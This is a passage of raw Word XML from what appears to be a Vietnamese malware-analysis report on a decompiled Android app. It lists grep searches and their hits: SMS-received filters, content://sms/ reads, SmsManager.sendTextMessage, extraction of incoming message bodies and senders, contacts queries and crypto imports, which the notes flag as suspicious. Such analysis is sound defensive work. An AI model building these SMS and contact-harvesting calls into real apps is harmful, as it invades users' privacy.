        <w:t>intent .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> | grep "\""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BBEA63" w14:textId="77777777" w:rsidR="002F62FD" w:rsidRPr="007A0331" w:rsidRDefault="002F62FD" w:rsidP="002F62FD">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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./c/a.java:33: Intent localIntent3 = localIntent1.setAction("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>android.intent</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.action.VIEW</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1BCBE1" w14:textId="77777777" w:rsidR="002F62FD" w:rsidRPr="007A0331" w:rsidRDefault="002F62FD" w:rsidP="002F62FD">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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./c/a.java:34: Intent localIntent4 = localIntent1.addCategory("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>android.intent</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.category.BROWSABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34695081" w14:textId="77777777" w:rsidR="002F62FD" w:rsidRPr="007A0331" w:rsidRDefault="002F62FD" w:rsidP="002F62FD">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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">./c/b.java:30: Intent localIntent1 = new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Intent(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>android.intent.action.CALL</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>", localUri);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47422F91" w14:textId="77777777" w:rsidR="002F62FD" w:rsidRPr="007A0331" w:rsidRDefault="002F62FD" w:rsidP="002F62FD">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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">./c/h.java:26: IntentFilter localIntentFilter = new </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>IntentFilter("</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>android.provider.Telephony.SMS_RECEIVED</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3F66A4" w14:textId="3299D447" w:rsidR="0070676B" w:rsidRPr="007A0331" w:rsidRDefault="0070676B" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-Việc sử dụng các API liên quan đến SMS, liên hệ và mật mã có thể được coi là đáng ngờ</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52717438" w14:textId="09E395E2" w:rsidR="0070676B" w:rsidRPr="007A0331" w:rsidRDefault="0070676B" w:rsidP="0070676B">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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tìm chuỗi “sms”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C9CDC"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 grep -rin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sms .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="089A8555"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c/c.java:26: Uri localUri = Uri.parse("</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>content://sms/</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9C674"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c/h.java:26: IntentFilter localIntentFilter = new IntentFilter("</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>android.provider.Telephony.SMS_RECEIVED</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F08F0"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c/j.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4:</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> android.telephony.SmsManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46ACE3"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c/j.java:29: SmsManager localSmsManager = </w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SmsManager.getDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63682A"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c/j.java:34: </w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>localSmsManager.sendTextMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(str1, null, str2, localPendingIntent1, localPendingIntent2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569FFC15"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R.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>7:</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> android.telephony.SmsMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52968FE3"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R.java:29: SmsMessage localSmsMessage = </w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SmsMessage.createFromPdu</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>((byte[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>])arrayOfObject</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751AE4A2"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R.java:32: String str5 = localSmsMessage.getOriginatingAddress();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C20DA5"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R.java:34: String str6 = localSmsMessage.getMessageBody();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF9A7A2" w14:textId="51CC48EE" w:rsidR="0070676B" w:rsidRPr="007A0331" w:rsidRDefault="0070676B" w:rsidP="0070676B">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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tìm chuỗi “contact”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9693E3"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 grep -rin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>contacts .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5EB43F15"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c/i.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>7:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> android.provider.ContactsContract.CommonDataKinds.Phone;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4FDBE"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lastRenderedPageBreak/>
        <w:t>./c/i.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>8:</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> android.provider.ContactsContract.Contacts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E73831"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c/i.java:30: </w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Uri localUri1 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ContactsContract.Contacts.CONTENT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>_URI;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63854B"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c/i.java:63: Uri localUri2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ContactsContract.CommonDataKinds.Phone.CONTENT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>_URI;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2516C2DB" w14:textId="2A302A33" w:rsidR="0070676B" w:rsidRPr="007A0331" w:rsidRDefault="0070676B" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Tìm chuỗi “scrypto”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E90DB3"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 xml:space="preserve"># grep -rin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>crypto .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="08BF89E9"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d/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> javax.crypto.spec.</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
